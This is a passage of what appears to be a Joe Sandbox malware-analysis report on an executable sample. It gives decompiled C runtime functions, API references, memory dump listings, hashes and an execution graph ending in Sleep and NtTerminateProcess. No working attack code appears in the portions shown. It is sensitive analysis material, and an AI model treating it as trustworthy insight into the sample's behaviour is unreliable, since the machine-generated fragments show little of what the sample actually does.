                  0x0040713f
                  0x00407144
                  0x0040714c
                  0x0040714f
                  0x0040715d
                  0x00407162
                  0x00407168
                  0x0040716d
                  0x0040716f
                  0x00407170
                  0x00407173
                  0x00407176
                  0x00407179
                  0x0040717e
                  0x00407182
                  0x00407189
                  0x0040718f
                  0x0040719b
                  0x004071a3

                  APIs
                  • __EH_prolog.LIBCMT ref: 0040712F
                  • std::bad_exception::bad_exception.LIBCMT ref: 0040714F
                  • __CxxThrowException@8.LIBCMT ref: 0040715D
                    • Part of subcall function 00408993: RaiseException.KERNEL32(?,?,00408992,?,?,?,?,%\@,00408992,?,0041DC84,005890B4,?,00405C25,?), ref: 004089D5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: ExceptionException@8H_prologRaiseThrowstd::bad_exception::bad_exception
                  • String ID: vector<T> too long
                  • API String ID: 1606262581-3788999226
                  • Opcode ID: 69cd5571ddfce6920626efc52f704254995346787261a5fd056a9b7cc15e5b1e
                  • Instruction ID: 42076f75a14a4ac4470151090ea84defdcca15381ee61ed573a18a751ee48fbe
                  • Opcode Fuzzy Hash: 69cd5571ddfce6920626efc52f704254995346787261a5fd056a9b7cc15e5b1e
                  • Instruction Fuzzy Hash: B2D0ECB291020856C704FAE1C946ADD7378AF14305F50503FF251B5085DFB856489659
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0041B2E5(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                  				intOrPtr _v8;
                  				signed int _v12;
                  				char _v20;
                  				signed int _t54;
                  				intOrPtr _t56;
                  				int _t57;
                  				int _t58;
                  				signed short* _t59;
                  				short* _t60;
                  				int _t65;
                  				char* _t72;
                  
                  				_t72 = _a8;
                  				if(_t72 == 0 || _a12 == 0) {
                  					L5:
                  					return 0;
                  				} else {
                  					if( *_t72 != 0) {
                  						E00409520( &_v20, _a16);
                  						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
                  							if(E0041815D( *_t72 & 0x000000ff,  &_v20) == 0) {
                  								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
                  									L10:
                  									if(_v8 != 0) {
                  										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                  									}
                  									return 1;
                  								}
                  								L21:
                  								_t54 = E0040B78C();
                  								 *_t54 = 0x2a;
                  								if(_v8 != 0) {
                  									_t54 = _v12;
                  									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
                  								}
                  								return _t54 | 0xffffffff;
                  							}
                  							_t56 = _v20;
                  							_t65 =  *(_t56 + 0xac);
                  							if(_t65 <= 1 || _a12 < _t65) {
                  								L17:
                  								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
                  									goto L21;
                  								} else {
                  									goto L19;
                  								}
                  							} else {
                  								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                  								_t56 = _v20;
                  								if(_t58 != 0) {
                  									L19:
                  									_t57 =  *(_t56 + 0xac);
                  									if(_v8 == 0) {
                  										return _t57;
                  									}
                  									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                  									return _t57;
                  								}
                  								goto L17;
                  							}
                  						}
                  						_t59 = _a4;
                  						if(_t59 != 0) {
                  							 *_t59 =  *_t72 & 0x000000ff;
                  						}
                  						goto L10;
                  					} else {
                  						_t60 = _a4;
                  						if(_t60 != 0) {
                  							 *_t60 = 0;
                  						}
                  						goto L5;
                  					}
                  				}
                  			}














                  0x0041b2ef
                  0x0041b2f6
                  0x0041b30d
                  0x00000000
                  0x0041b2fd
                  0x0041b2ff
                  0x0041b319
                  0x0041b324
                  0x0041b356
                  0x0041b3f4
                  0x0041b334
                  0x0041b337
                  0x0041b33c
                  0x0041b33c
                  0x00000000
                  0x0041b342
                  0x0041b3b6
                  0x0041b3b6
                  0x0041b3bb
                  0x0041b3c4
                  0x0041b3c6
                  0x0041b3c9
                  0x0041b3c9
                  0x00000000
                  0x0041b3cd
                  0x0041b358
                  0x0041b35b
                  0x0041b364
                  0x0041b38b
                  0x0041b394
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041b36b
                  0x0041b37e
                  0x0041b386
                  0x0041b389
                  0x0041b39b
                  0x0041b39b
                  0x0041b3a4
                  0x0041b312
                  0x0041b312
                  0x0041b3ad
                  0x00000000
                  0x0041b3ad
                  0x00000000
                  0x0041b389
                  0x0041b364
                  0x0041b326
                  0x0041b32b
                  0x0041b331
                  0x0041b331
                  0x00000000
                  0x0041b301
                  0x0041b301
                  0x0041b306
                  0x0041b30a
                  0x0041b30a
                  0x00000000
                  0x0041b306
                  0x0041b2ff

                  APIs
                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041B319
                  • __isleadbyte_l.LIBCMT ref: 0041B34D
                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000,00000000), ref: 0041B37E
                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000,00000000), ref: 0041B3EC
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                  • String ID:
                  • API String ID: 3058430110-0
                  • Opcode ID: d1751aa10d7e272af0a786b944692fa67db3e632575f20c9d99d3119fca490e7
                  • Instruction ID: 7244f1dc7e8ca15d7e6b135263701ff30affec06e82036b72f7569097ebb19b3
                  • Opcode Fuzzy Hash: d1751aa10d7e272af0a786b944692fa67db3e632575f20c9d99d3119fca490e7
                  • Instruction Fuzzy Hash: BC31CE31A0424AEFCB20DF64C8849EF7BA5EF01310B14456AF8719B291E734DDA1DB99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040C575(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                  				intOrPtr _t25;
                  				void* _t26;
                  				void* _t28;
                  
                  				_t25 = _a16;
                  				if(_t25 == 0x65 || _t25 == 0x45) {
                  					_t26 = E0040BE66(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                  					goto L9;
                  				} else {
                  					_t34 = _t25 - 0x66;
                  					if(_t25 != 0x66) {
                  						__eflags = _t25 - 0x61;
                  						if(_t25 == 0x61) {
                  							L7:
                  							_t26 = E0040BF56(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                  						} else {
                  							__eflags = _t25 - 0x41;
                  							if(__eflags == 0) {
                  								goto L7;
                  							} else {
                  								_t26 = E0040C47B(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                  							}
                  						}
                  						L9:
                  						return _t26;
                  					} else {
                  						return E0040C3C0(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                  					}
                  				}
                  			}






                  0x0040c57a
                  0x0040c580
                  0x0040c5f3
                  0x00000000
                  0x0040c587
                  0x0040c587
                  0x0040c58a
                  0x0040c5a5
                  0x0040c5a8
                  0x0040c5c8
                  0x0040c5da
                  0x0040c5aa
                  0x0040c5aa
                  0x0040c5ad
                  0x00000000
                  0x0040c5af
                  0x0040c5c1
                  0x0040c5c1
                  0x0040c5ad
                  0x0040c5f8
                  0x0040c5fc
                  0x0040c58c
                  0x0040c5a4
                  0x0040c5a4
                  0x0040c58a

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                  • String ID:
                  • API String ID: 3016257755-0
                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                  • Instruction ID: fd594d69085debdeafe1bda514c30db4bd561ab30137952ea5036e48772960c9
                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                  • Instruction Fuzzy Hash: 0511B77604004AFBCF165F84CC81CEE3F62BB19344B448526FE18641B1C33ADA71AB89
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0040A76C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t13;
                  				void* _t25;
                  				intOrPtr _t27;
                  				intOrPtr _t29;
                  				void* _t30;
                  				void* _t31;
                  
                  				_t31 = __eflags;
                  				_t26 = __edi;
                  				_t22 = __ebx;
                  				_push(0xc);
                  				_push(0x41e2f8);
                  				E0040EF38(__ebx, __edi, __esi);
                  				_t29 = E0040DEA3(__ebx, _t25, _t31);
                  				_t13 =  *0x4311f0; // 0xfffffffe
                  				if(( *(_t29 + 0x70) & _t13) == 0) {
                  					L6:
                  					E0040E43F(_t22, _t26, 0xc);
                  					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                  					_t8 = _t29 + 0x6c; // 0x6c
                  					_t27 =  *0x4312d8; // 0x431200
                  					 *((intOrPtr*)(_t30 - 0x1c)) = E0040A72E(_t8, _t27);
                  					 *(_t30 - 4) = 0xfffffffe;
                  					E0040A7D6();
                  				} else {
                  					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                  					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                  						goto L6;
                  					} else {
                  						_t29 =  *((intOrPtr*)(E0040DEA3(_t22, _t25, _t33) + 0x6c));
                  					}
                  				}
                  				if(_t29 == 0) {
                  					E0040F461(_t25, 0x20);
                  				}
                  				return E0040EF7D(_t29);
                  			}









                  0x0040a76c
                  0x0040a76c
                  0x0040a76c
                  0x0040a76c
                  0x0040a76e
                  0x0040a773
                  0x0040a77d
                  0x0040a77f
                  0x0040a787
                  0x0040a7ab
                  0x0040a7ad
                  0x0040a7b3
                  0x0040a7b7
                  0x0040a7ba
                  0x0040a7c5
                  0x0040a7c8
                  0x0040a7cf
                  0x0040a789
                  0x0040a789
                  0x0040a78d
                  0x00000000
                  0x0040a78f
                  0x0040a794
                  0x0040a794
                  0x0040a78d
                  0x0040a799
                  0x0040a79d
                  0x0040a7a2
                  0x0040a7aa

                  APIs
                  • __getptd.LIBCMT ref: 0040A778
                    • Part of subcall function 0040DEA3: __getptd_noexit.LIBCMT ref: 0040DEA6
                    • Part of subcall function 0040DEA3: __amsg_exit.LIBCMT ref: 0040DEB3
                  • __getptd.LIBCMT ref: 0040A78F
                  • __amsg_exit.LIBCMT ref: 0040A79D
                  • __lock.LIBCMT ref: 0040A7AD
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                  • String ID:
                  • API String ID: 3521780317-0
                  • Opcode ID: aa6ed99abc64c891ac31feeaaf39433fc2ad42ada5a402ef7d643317ffbe2b54
                  • Instruction ID: ac4797e92ef69f602190e8664604eebcd566a754edb1e8a05d15aa98ff2f15e6
                  • Opcode Fuzzy Hash: aa6ed99abc64c891ac31feeaaf39433fc2ad42ada5a402ef7d643317ffbe2b54
                  • Instruction Fuzzy Hash: 6CF030359507119AD720FBBAD802B4A72B06F90718F10867FE450BB2D2CB7CA9558B9F
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040FB65() {
                  				intOrPtr _t5;
                  				intOrPtr _t6;
                  				intOrPtr _t10;
                  				void* _t12;
                  				intOrPtr _t15;
                  				intOrPtr* _t16;
                  				signed int _t19;
                  				signed int _t20;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  
                  				_t5 =  *0x58ada0;
                  				_t26 = 0x14;
                  				if(_t5 != 0) {
                  					if(_t5 < _t26) {
                  						_t5 = _t26;
                  						goto L4;
                  					}
                  				} else {
                  					_t5 = 0x200;
                  					L4:
                  					 *0x58ada0 = _t5;
                  				}
                  				_t6 = E0040A2DA(_t5, 4);
                  				 *0x589d80 = _t6;
                  				if(_t6 != 0) {
                  					L8:
                  					_t19 = 0;
                  					_t15 = 0x4309f8;
                  					while(1) {
                  						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                  						_t15 = _t15 + 0x20;
                  						_t19 = _t19 + 4;
                  						if(_t15 >= 0x430c78) {
                  							break;
                  						}
                  						_t6 =  *0x589d80; // 0x21a0fd0
                  					}
                  					_t27 = 0xfffffffe;
                  					_t20 = 0;
                  					_t16 = 0x430a08;
                  					do {
                  						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x589c80 + (_t20 >> 5) * 4))));
                  						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                  							 *_t16 = _t27;
                  						}
                  						_t16 = _t16 + 0x20;
                  						_t20 = _t20 + 1;
                  					} while (_t16 < 0x430a68);
                  					return 0;
                  				} else {
                  					 *0x58ada0 = _t26;
                  					_t6 = E0040A2DA(_t26, 4);
                  					 *0x589d80 = _t6;
                  					if(_t6 != 0) {
                  						goto L8;
                  					} else {
                  						_t12 = 0x1a;
                  						return _t12;
                  					}
                  				}
                  			}













                  0x0040fb65
                  0x0040fb6d
                  0x0040fb70
                  0x0040fb7b
                  0x0040fb7d
                  0x00000000
                  0x0040fb7d
                  0x0040fb72
                  0x0040fb72
                  0x0040fb7f
                  0x0040fb7f
                  0x0040fb7f
                  0x0040fb87
                  0x0040fb8e
                  0x0040fb95
                  0x0040fbb5
                  0x0040fbb5
                  0x0040fbb7
                  0x0040fbc3
                  0x0040fbc3
                  0x0040fbc6
                  0x0040fbc9
                  0x0040fbd2
                  0x00000000
                  0x00000000
                  0x0040fbbe
                  0x0040fbbe
                  0x0040fbd6
                  0x0040fbd7
                  0x0040fbd9
                  0x0040fbdf
                  0x0040fbf3
                  0x0040fbf9
                  0x0040fc03
                  0x0040fc03
                  0x0040fc05
                  0x0040fc08
                  0x0040fc09
                  0x0040fc15
                  0x0040fb97
                  0x0040fb9a
                  0x0040fba0
                  0x0040fba7
                  0x0040fbae
                  0x00000000
                  0x0040fbb0
                  0x0040fbb2
                  0x0040fbb4
                  0x0040fbb4
                  0x0040fbae

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: __calloc_crt
                  • String ID: hC
                  • API String ID: 3494438863-2898246442
                  • Opcode ID: 1e5266166ddf5a609b8dc43ceae80ef3c9e758472361a41a26305f7d25a589bf
                  • Instruction ID: 6d5708f63d673b3498be43454bc9c1e08c72c7732783bcff1d19ad24b83a50e6
                  • Opcode Fuzzy Hash: 1e5266166ddf5a609b8dc43ceae80ef3c9e758472361a41a26305f7d25a589bf
                  • Instruction Fuzzy Hash: 1911EB313056114BF7348A1DFC61AA23291F794324B18123BE901F77D4E778A849974D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E0040D3A9(void* __ebx, void* __edi, intOrPtr* __esi) {
                  				intOrPtr _t17;
                  				void* _t26;
                  				intOrPtr* _t28;
                  				void* _t29;
                  				void* _t30;
                  
                  				_t28 = __esi;
                  				_t19 = __ebx;
                  				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                  				E0040883F(__ebx, __edi, __esi,  *((intOrPtr*)(_t29 - 0x28)));
                  				 *((intOrPtr*)(E0040DEA3(__ebx, _t26, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                  				_t17 = E0040DEA3(_t19, _t26, _t30);
                  				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                  				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                  					_t17 =  *((intOrPtr*)(__esi + 0x14));
                  					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                  						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                  							_t17 = E00408818( *((intOrPtr*)(_t28 + 0x18)));
                  							_t38 = _t17;
                  							if(_t17 != 0) {
                  								_push( *((intOrPtr*)(_t29 + 0x10)));
                  								_push(_t28);
                  								return E0040D141(_t38);
                  							}
                  						}
                  					}
                  				}
                  				return _t17;
                  			}








                  0x0040d3a9
                  0x0040d3a9
                  0x0040d3ac
                  0x0040d3b2
                  0x0040d3c0
                  0x0040d3c6
                  0x0040d3ce
                  0x0040d3da
                  0x0040d3e2
                  0x0040d3ea
                  0x0040d3fe
                  0x0040d409
                  0x0040d40f
                  0x0040d411
                  0x0040d413
                  0x0040d416
                  0x00000000
                  0x0040d41d
                  0x0040d411
                  0x0040d3fe
                  0x0040d3ea
                  0x0040d41e

                  APIs
                    • Part of subcall function 0040883F: __getptd.LIBCMT ref: 00408845
                    • Part of subcall function 0040883F: __getptd.LIBCMT ref: 00408855
                  • __getptd.LIBCMT ref: 0040D3B8
                    • Part of subcall function 0040DEA3: __getptd_noexit.LIBCMT ref: 0040DEA6
                    • Part of subcall function 0040DEA3: __amsg_exit.LIBCMT ref: 0040DEB3
                  • __getptd.LIBCMT ref: 0040D3C6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: csm
                  • API String ID: 803148776-1018135373
                  • Opcode ID: ac1f973b796d5365a90fbcd4a746e398fb8950caba162102ecc38e3d6b3026eb
                  • Instruction ID: 40d6bb4f4d65bf62d272264d28add61a1beb27104a0deb0f638c3828df9dfac2
                  • Opcode Fuzzy Hash: ac1f973b796d5365a90fbcd4a746e398fb8950caba162102ecc38e3d6b3026eb
                  • Instruction Fuzzy Hash: 85014F39C00215CBCF34AFA5C44066EB3B5AF58311F54443FE8417AAD1CF78A988DB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E00405A80(intOrPtr* __ecx) {
                  				intOrPtr* _t28;
                  				void* _t30;
                  
                  				_t24 = __ecx;
                  				E004088F4(E0041B930, _t30);
                  				_push(__ecx);
                  				_push(__ecx);
                  				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
                  				_t28 = __ecx;
                  				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
                  				if( *((intOrPtr*)(_t30 + 0x10)) != 0) {
                  					_t24 = __ecx + 4;
                  					 *__ecx = 0x401594;
                  					E00405977(__ecx + 4);
                  					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                  					 *(_t30 - 0x10) = 1;
                  				}
                  				 *((intOrPtr*)(_t28 +  *((intOrPtr*)( *_t28 + 4)))) = 0x401428;
                  				if( *((char*)(_t30 + 0xc)) != 0) {
                  					E00407D0A(_t24,  *((intOrPtr*)( *_t28 + 4)) + _t28);
                  				}
                  				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
                  				return _t28;
                  			}





                  0x00405a80
                  0x00405a85
                  0x00405a8a
                  0x00405a8b
                  0x00405a8c
                  0x00405a95
                  0x00405a97
                  0x00405a9a
                  0x00405a9c
                  0x00405a9f
                  0x00405aa5
                  0x00405aaa
                  0x00405aae
                  0x00405aae
                  0x00405abe
                  0x00405ac5
                  0x00405acf
                  0x00405ad4
                  0x00405adb
                  0x00405ae3

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: AddstdH_prologstd::ios_base::_
                  • String ID: )d@
                  • API String ID: 2233147633-3213904718
                  • Opcode ID: c0bd553b6c3e0a0b5c3f6e343adaeb3a6d80b444fe5c59cb1b44f4dcdecf4322
                  • Instruction ID: f948699608376b58d3f5620e85ddc316ec54d55a282d4a6f2d067584a834ddbb
                  • Opcode Fuzzy Hash: c0bd553b6c3e0a0b5c3f6e343adaeb3a6d80b444fe5c59cb1b44f4dcdecf4322
                  • Instruction Fuzzy Hash: 68F037B1A102199BD724DF88C945BABB7E4EF08318F10852FE456A7391C7B899008F98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00405CA9(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                  				intOrPtr* _t8;
                  
                  				_t8 = __ecx;
                  				E00404E5A(__ecx, _a8);
                  				 *__ecx = 0x401448;
                  				E00404EA8(__ecx, _a4);
                  				return _t8;
                  			}




                  0x00405cb0
                  0x00405cb2
                  0x00405cbc
                  0x00405cc2
                  0x00405ccb

                  APIs
                  • std::bad_exception::bad_exception.LIBCMT ref: 00405CB2
                  • ctype.LIBCPMT ref: 00405CC2
                    • Part of subcall function 00404EA8: std::_Locinfo::_Getctype.LIBCPMT ref: 00404EB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: GetctypeLocinfo::_ctypestd::_std::bad_exception::bad_exception
                  • String ID: 2^@
                  • API String ID: 2674405937-2320161190
                  • Opcode ID: 0116631074bcb9293018189d3321ef4837ce9d60397568c8b38699cbcd5ef7e0
                  • Instruction ID: 038659545e62cf6c85caa0479139b008d356541d357042b339247e084cb19f82
                  • Opcode Fuzzy Hash: 0116631074bcb9293018189d3321ef4837ce9d60397568c8b38699cbcd5ef7e0
                  • Instruction Fuzzy Hash: 1FC0127220022867CB103E9AD80188ABF59FB957B5701803BBE4466391CB7A982097E5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Execution Graph

                  Execution Coverage:6.1%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:0%
                  Total number of Nodes:19
                  Total number of Limit Nodes:0
                  execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                  Callgraph

                  • Executed
                  • Not Executed
                  • Opacity -> Relevance
                  • Disassembly available
